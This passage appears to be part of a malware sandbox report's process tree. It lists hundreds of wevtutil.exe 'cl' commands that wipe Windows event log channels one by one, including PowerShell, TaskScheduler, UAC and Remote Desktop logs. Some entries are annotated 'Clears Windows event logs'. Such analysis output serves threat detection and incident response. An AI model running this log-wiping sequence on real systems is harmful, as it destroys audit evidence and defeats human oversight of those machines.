- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-International/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-MCT/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Recovery/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Sens/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Superfetch/Main"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-SystemHealthAgent/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ThemeCPL/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ThemeUI/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TunnelDriver"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UAC-FileVirtualization/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UAC/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIAnimation/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Perf"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIRibbon/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-USB-USBHUB/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-USB-USBPORT/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-User Control Panel Performance/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-User Profile Service/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-User Profile Service/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-User-Loader/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserModePowerService/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceNotifications"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserPnp/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserPnp/SchedulerOperations"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UxTheme/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VAN/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VDRVROOT/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VHDMP/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VWiFi/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VolumeControl/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WABSyncProvider/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WER-Diag/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WFP/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WFP/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WLAN-AutoConfig/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WLANConnectionFlow/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMI-Activity/Trace"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPDMCCore/Diagnostic"3⤵
-
